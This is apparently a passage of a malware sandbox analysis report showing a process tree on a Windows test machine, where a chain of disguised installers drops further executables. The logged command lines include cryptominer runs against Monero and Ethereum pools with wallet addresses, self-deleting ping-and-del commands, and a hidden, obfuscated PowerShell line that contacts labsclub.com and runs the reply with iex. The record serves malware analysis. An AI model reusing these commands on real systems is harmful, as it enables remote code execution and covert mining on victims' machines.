C:\Users\Admin\AppData\Local\Temp\9OZB3R31I9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9OZB3R31I9\multitimer.exe" 1 3.1617398060.6067892c05412 10418⤵PID:7456
-
C:\Users\Admin\AppData\Local\Temp\9OZB3R31I9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9OZB3R31I9\multitimer.exe" 2 3.1617398060.6067892c0541219⤵PID:2256
-
C:\Users\Admin\AppData\Local\Temp\tzvdtojt5ko\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\tzvdtojt5ko\cpyrix.exe" /VERYSILENT20⤵PID:8068
-
-
C:\Users\Admin\AppData\Local\Temp\0n4ddi00n4a\app.exe"C:\Users\Admin\AppData\Local\Temp\0n4ddi00n4a\app.exe" /8-2320⤵PID:4720
-
-
C:\Users\Admin\AppData\Local\Temp\3cgfa4khigp\vpn.exe"C:\Users\Admin\AppData\Local\Temp\3cgfa4khigp\vpn.exe" /silent /subid=48220⤵PID:7308
-
C:\Users\Admin\AppData\Local\Temp\is-DVRNP.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-DVRNP.tmp\vpn.tmp" /SL5="$30752,15170975,270336,C:\Users\Admin\AppData\Local\Temp\3cgfa4khigp\vpn.exe" /silent /subid=48221⤵PID:8272
-
-
-
C:\Users\Admin\AppData\Local\Temp\3wslxpr24np\vict.exe"C:\Users\Admin\AppData\Local\Temp\3wslxpr24np\vict.exe" /VERYSILENT /id=53520⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\is-85Q77.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-85Q77.tmp\vict.tmp" /SL5="$20748,870426,780800,C:\Users\Admin\AppData\Local\Temp\3wslxpr24np\vict.exe" /VERYSILENT /id=53521⤵PID:3400
-
-
-
C:\Users\Admin\AppData\Local\Temp\ejp5pt3jzan\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ejp5pt3jzan\Setup3310.exe" /Verysilent /subid=57720⤵PID:6168
-
C:\Users\Admin\AppData\Local\Temp\is-UR4DL.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-UR4DL.tmp\Setup3310.tmp" /SL5="$80426,138429,56832,C:\Users\Admin\AppData\Local\Temp\ejp5pt3jzan\Setup3310.exe" /Verysilent /subid=57721⤵PID:8848
-
-
-
C:\Users\Admin\AppData\Local\Temp\dv4a0evtawx\qfcxebiz22l.exe"C:\Users\Admin\AppData\Local\Temp\dv4a0evtawx\qfcxebiz22l.exe" /ustwo INSTALL20⤵PID:8364
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8BGZ1KEJXL\setups.exe"C:\Users\Admin\AppData\Local\Temp\8BGZ1KEJXL\setups.exe" ll17⤵PID:4828
-
C:\Users\Admin\AppData\Local\Temp\is-10US4.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-10US4.tmp\setups.tmp" /SL5="$30662,635399,250368,C:\Users\Admin\AppData\Local\Temp\8BGZ1KEJXL\setups.exe" ll18⤵PID:7360
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9d-3fca5-d16-281b4-1d331208883c7\Vibaposaelo.exe"C:\Users\Admin\AppData\Local\Temp\9d-3fca5-d16-281b4-1d331208883c7\Vibaposaelo.exe"14⤵PID:6080
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:1096
-
C:\Users\Admin\AppData\Local\Temp\is-PHGJQ.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-PHGJQ.tmp\lylal220.tmp" /SL5="$2032C,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:3116
-
C:\Users\Admin\AppData\Local\Temp\is-4TBN6.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-4TBN6.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:5900
-
C:\Program Files\Windows Sidebar\OZXGVVXHPB\irecord.exe"C:\Program Files\Windows Sidebar\OZXGVVXHPB\irecord.exe" /VERYSILENT14⤵PID:1576
-
C:\Users\Admin\AppData\Local\Temp\is-PFIHQ.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-PFIHQ.tmp\irecord.tmp" /SL5="$2028C,6265333,408064,C:\Program Files\Windows Sidebar\OZXGVVXHPB\irecord.exe" /VERYSILENT15⤵PID:5896
-
-
-
C:\Users\Admin\AppData\Local\Temp\b0-a9944-46d-0cd8a-c1389d023973d\Doshufigogu.exe"C:\Users\Admin\AppData\Local\Temp\b0-a9944-46d-0cd8a-c1389d023973d\Doshufigogu.exe"14⤵PID:6008
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v5mgl0gi.am4\md6_6ydj.exe & exit15⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\v5mgl0gi.am4\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\v5mgl0gi.am4\md6_6ydj.exe16⤵PID:6844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pllxjbcy.orh\askinstall31.exe & exit15⤵PID:6692
-
C:\Users\Admin\AppData\Local\Temp\pllxjbcy.orh\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\pllxjbcy.orh\askinstall31.exe16⤵PID:6716
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:1784
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:8004
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0abjtcp0.udn\toolspab1.exe & exit15⤵PID:4816
-
C:\Users\Admin\AppData\Local\Temp\0abjtcp0.udn\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\0abjtcp0.udn\toolspab1.exe16⤵PID:6720
-
C:\Users\Admin\AppData\Local\Temp\0abjtcp0.udn\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\0abjtcp0.udn\toolspab1.exe17⤵PID:7720
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x1k5jxed.b3k\setup_10.2_mix.exe & exit15⤵PID:7832
-
C:\Users\Admin\AppData\Local\Temp\x1k5jxed.b3k\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\x1k5jxed.b3k\setup_10.2_mix.exe16⤵PID:4180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uu4nsawc.uk3\GcleanerWW.exe /mixone & exit15⤵PID:7880
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nbzz03up.1id\app.exe /8-2222 & exit15⤵PID:6660
-
C:\Users\Admin\AppData\Local\Temp\nbzz03up.1id\app.exeC:\Users\Admin\AppData\Local\Temp\nbzz03up.1id\app.exe /8-222216⤵PID:6208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ogowhsc0.yb5\file.exe & exit15⤵PID:4540
-
C:\Users\Admin\AppData\Local\Temp\ogowhsc0.yb5\file.exeC:\Users\Admin\AppData\Local\Temp\ogowhsc0.yb5\file.exe16⤵PID:4276
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"17⤵PID:5412
-
C:\Users\Admin\AppData\Local\Temp\OQGFJGG7NC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OQGFJGG7NC\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:3784
-
C:\Users\Admin\AppData\Local\Temp\OQGFJGG7NC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OQGFJGG7NC\multitimer.exe" 1 3.1617398068.606789350040d 10119⤵PID:8908
-
C:\Users\Admin\AppData\Local\Temp\OQGFJGG7NC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OQGFJGG7NC\multitimer.exe" 2 3.1617398068.606789350040d20⤵PID:8904
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9KU3YDEINZ\setups.exe"C:\Users\Admin\AppData\Local\Temp\9KU3YDEINZ\setups.exe" ll18⤵PID:4928
-
C:\Users\Admin\AppData\Local\Temp\is-12IMJ.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-12IMJ.tmp\setups.tmp" /SL5="$20680,635399,250368,C:\Users\Admin\AppData\Local\Temp\9KU3YDEINZ\setups.exe" ll19⤵PID:3884
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"17⤵PID:1540
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"17⤵PID:4544
-
C:\Users\Admin\AppData\Roaming\6057.tmp.exe"C:\Users\Admin\AppData\Roaming\6057.tmp.exe"18⤵PID:6240
-
C:\Users\Admin\AppData\Roaming\6057.tmp.exe"C:\Users\Admin\AppData\Roaming\6057.tmp.exe"19⤵PID:8248
-
-
-
C:\Users\Admin\AppData\Roaming\6D69.tmp.exe"C:\Users\Admin\AppData\Roaming\6D69.tmp.exe"18⤵PID:5468
-
-
C:\Users\Admin\AppData\Roaming\6D58.tmp.exe"C:\Users\Admin\AppData\Roaming\6D58.tmp.exe"18⤵PID:4068
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:9044
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵PID:8244
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"18⤵PID:5360
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:9080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"17⤵PID:7200
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t3wd354g.npj\Four.exe & exit15⤵PID:6764
-
C:\Users\Admin\AppData\Local\Temp\t3wd354g.npj\Four.exeC:\Users\Admin\AppData\Local\Temp\t3wd354g.npj\Four.exe16⤵PID:7648
-
C:\Users\Admin\AppData\Local\Temp\W27ZYXGZCN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\W27ZYXGZCN\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:5316
-
C:\Users\Admin\AppData\Local\Temp\W27ZYXGZCN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\W27ZYXGZCN\multitimer.exe" 1 3.1617398069.6067893575743 10418⤵PID:8936
-
C:\Users\Admin\AppData\Local\Temp\W27ZYXGZCN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\W27ZYXGZCN\multitimer.exe" 2 3.1617398069.606789357574319⤵PID:8880
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PXCH9G3D9M\setups.exe"C:\Users\Admin\AppData\Local\Temp\PXCH9G3D9M\setups.exe" ll17⤵PID:2692
-
C:\Users\Admin\AppData\Local\Temp\is-RVKSS.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-RVKSS.tmp\setups.tmp" /SL5="$205B6,635399,250368,C:\Users\Admin\AppData\Local\Temp\PXCH9G3D9M\setups.exe" ll18⤵PID:3732
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\f6-ee80e-610-4a2a1-19f81e8bf31ad\Cizhaerimalu.exe"C:\Users\Admin\AppData\Local\Temp\f6-ee80e-610-4a2a1-19f81e8bf31ad\Cizhaerimalu.exe"14⤵PID:4616
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:4596
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:6048
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:5968
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"11⤵PID:4216
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:5788
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:6088
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"11⤵PID:3900
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"12⤵PID:6436
-
C:\Users\Admin\Videos\lilal.exe"C:\Users\Admin\Videos\lilal.exe"13⤵PID:8040
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"14⤵PID:7592
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui14⤵PID:7684
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe15⤵PID:7676
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 6436 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"13⤵PID:1196
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 643614⤵
- Kills process with taskkill
PID:7480
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:4916
-
C:\Users\Admin\AppData\Local\Temp\MIECEI1WQB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MIECEI1WQB\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:4500
-
C:\Users\Admin\AppData\Local\Temp\MIECEI1WQB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MIECEI1WQB\multitimer.exe" 1 3.1617397955.606788c3f1931 10313⤵PID:5420
-
C:\Users\Admin\AppData\Local\Temp\MIECEI1WQB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MIECEI1WQB\multitimer.exe" 2 3.1617397955.606788c3f193114⤵PID:196
-
C:\Users\Admin\AppData\Local\Temp\banqnzv2mag\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\banqnzv2mag\Setup3310.exe" /Verysilent /subid=57715⤵PID:6284
-
C:\Users\Admin\AppData\Local\Temp\is-4HJP3.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-4HJP3.tmp\Setup3310.tmp" /SL5="$602BA,138429,56832,C:\Users\Admin\AppData\Local\Temp\banqnzv2mag\Setup3310.exe" /Verysilent /subid=57716⤵PID:6416
-
C:\Users\Admin\AppData\Local\Temp\is-P7V6L.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-P7V6L.tmp\Setup.exe" /Verysilent17⤵PID:4040
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\v3v0fhuk4we\adwxkvm2rtf.exe"C:\Users\Admin\AppData\Local\Temp\v3v0fhuk4we\adwxkvm2rtf.exe" /ustwo INSTALL15⤵PID:6276
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 65216⤵
- Program crash
PID:6296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 66816⤵
- Program crash
PID:6220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 67216⤵
- Program crash
PID:7152
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 80816⤵
- Program crash
PID:6236
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 90416⤵
- Program crash
PID:7260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 94816⤵
- Program crash
PID:3500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 99216⤵
- Program crash
PID:7264
-
-
-
C:\Users\Admin\AppData\Local\Temp\tua3rbtctlh\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\tua3rbtctlh\cpyrix.exe" /VERYSILENT15⤵PID:6300
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:6932
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"17⤵PID:8088
-
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"17⤵PID:2796
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:6336
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"17⤵PID:5032
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub17⤵PID:6516
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe18⤵PID:3252
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\w5xfuljxnir\vict.exe"C:\Users\Admin\AppData\Local\Temp\w5xfuljxnir\vict.exe" /VERYSILENT /id=53515⤵PID:6360
-
C:\Users\Admin\AppData\Local\Temp\is-R0SAL.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-R0SAL.tmp\vict.tmp" /SL5="$401FA,870426,780800,C:\Users\Admin\AppData\Local\Temp\w5xfuljxnir\vict.exe" /VERYSILENT /id=53516⤵PID:6556
-
C:\Users\Admin\AppData\Local\Temp\is-FFGH8.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-FFGH8.tmp\win1host.exe" 53517⤵PID:6952
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0lvlehjlwoz\app.exe"C:\Users\Admin\AppData\Local\Temp\0lvlehjlwoz\app.exe" /8-2315⤵PID:6460
-
-
C:\Users\Admin\AppData\Local\Temp\rybc1orb0xg\vpn.exe"C:\Users\Admin\AppData\Local\Temp\rybc1orb0xg\vpn.exe" /silent /subid=48215⤵PID:6532
-
C:\Users\Admin\AppData\Local\Temp\is-GV7GE.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-GV7GE.tmp\vpn.tmp" /SL5="$203E2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\rybc1orb0xg\vpn.exe" /silent /subid=48216⤵PID:6624
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LJPIVYYOKU\setups.exe"C:\Users\Admin\AppData\Local\Temp\LJPIVYYOKU\setups.exe" ll12⤵PID:5824
-
C:\Users\Admin\AppData\Local\Temp\is-OLU78.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-OLU78.tmp\setups.tmp" /SL5="$6035A,635399,250368,C:\Users\Admin\AppData\Local\Temp\LJPIVYYOKU\setups.exe" ll13⤵PID:4200
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:4744
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:3032
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:2420
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:3744
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\p3nkujmzvh4\vpn.exe"C:\Users\Admin\AppData\Local\Temp\p3nkujmzvh4\vpn.exe" /silent /subid=4828⤵PID:5352
-
C:\Users\Admin\AppData\Local\Temp\is-3FTPI.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-3FTPI.tmp\vpn.tmp" /SL5="$202A8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\p3nkujmzvh4\vpn.exe" /silent /subid=4829⤵PID:5532
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5548
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:2368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:5808
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:4424
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:8028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rnuu12jbrtp\app.exe"C:\Users\Admin\AppData\Local\Temp\rnuu12jbrtp\app.exe" /8-238⤵PID:5332
-
-
C:\Users\Admin\AppData\Local\Temp\gsyk4uuzkem\vict.exe"C:\Users\Admin\AppData\Local\Temp\gsyk4uuzkem\vict.exe" /VERYSILENT /id=5358⤵PID:5256
-
C:\Users\Admin\AppData\Local\Temp\is-4CDLA.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-4CDLA.tmp\vict.tmp" /SL5="$70218,870426,780800,C:\Users\Admin\AppData\Local\Temp\gsyk4uuzkem\vict.exe" /VERYSILENT /id=5359⤵PID:5480
-
C:\Users\Admin\AppData\Local\Temp\is-96993.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-96993.tmp\win1host.exe" 53510⤵PID:6012
-
C:\Users\Admin\AppData\Local\Temp\bfuFIEcEZ.exe"C:\Users\Admin\AppData\Local\Temp\bfuFIEcEZ.exe"11⤵PID:4036
-
C:\Users\Admin\AppData\Local\Temp\bfuFIEcEZ.exe"C:\Users\Admin\AppData\Local\Temp\bfuFIEcEZ.exe"12⤵PID:5404
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 56811⤵
- Program crash
PID:4660
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a3z0uebtp4w\aspnt4vhqm0.exe"C:\Users\Admin\AppData\Local\Temp\a3z0uebtp4w\aspnt4vhqm0.exe"8⤵PID:5248
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\a3z0uebtp4w\aspnt4vhqm0.exe"9⤵PID:5488
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:4992
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\elnnlzq4pem\4pgooth1hlp.exe"C:\Users\Admin\AppData\Local\Temp\elnnlzq4pem\4pgooth1hlp.exe" /VERYSILENT8⤵PID:5148
-
C:\Users\Admin\AppData\Local\Temp\is-DTKAI.tmp\4pgooth1hlp.tmp"C:\Users\Admin\AppData\Local\Temp\is-DTKAI.tmp\4pgooth1hlp.tmp" /SL5="$201F2,2592217,780800,C:\Users\Admin\AppData\Local\Temp\elnnlzq4pem\4pgooth1hlp.exe" /VERYSILENT9⤵PID:5408
-
C:\Users\Admin\AppData\Local\Temp\is-84L3E.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-84L3E.tmp\winlthsth.exe"10⤵PID:5984
-
C:\Users\Admin\AppData\Local\Temp\EN5NiVJNU.exe"C:\Users\Admin\AppData\Local\Temp\EN5NiVJNU.exe"11⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\EN5NiVJNU.exe"C:\Users\Admin\AppData\Local\Temp\EN5NiVJNU.exe"12⤵PID:5544
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:6340
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:7028
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xcafecoewt2\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\xcafecoewt2\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5516
-
C:\Users\Admin\AppData\Local\Temp\is-722EP.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-722EP.tmp\IBInstaller_97039.tmp" /SL5="$103D4,12322324,721408,C:\Users\Admin\AppData\Local\Temp\xcafecoewt2\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5772
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵PID:5936
-
-
C:\Users\Admin\AppData\Local\Temp\is-VMJGP.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-VMJGP.tmp\{app}\chrome_proxy.exe"10⤵PID:5952
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-VMJGP.tmp\{app}\chrome_proxy.exe"11⤵PID:5432
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
PID:5124
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\v1jn0n23z31\s4z0go0np0a.exe"C:\Users\Admin\AppData\Local\Temp\v1jn0n23z31\s4z0go0np0a.exe" /quiet SILENT=1 AF=7568⤵PID:5492
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\v1jn0n23z31\s4z0go0np0a.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\v1jn0n23z31\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617138368 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5448
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\463EVB2IYL\setups.exe"C:\Users\Admin\AppData\Local\Temp\463EVB2IYL\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Users\Admin\AppData\Local\Temp\is-688F4.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-688F4.tmp\setups.tmp" /SL5="$5003C,635399,250368,C:\Users\Admin\AppData\Local\Temp\463EVB2IYL\setups.exe" ll6⤵
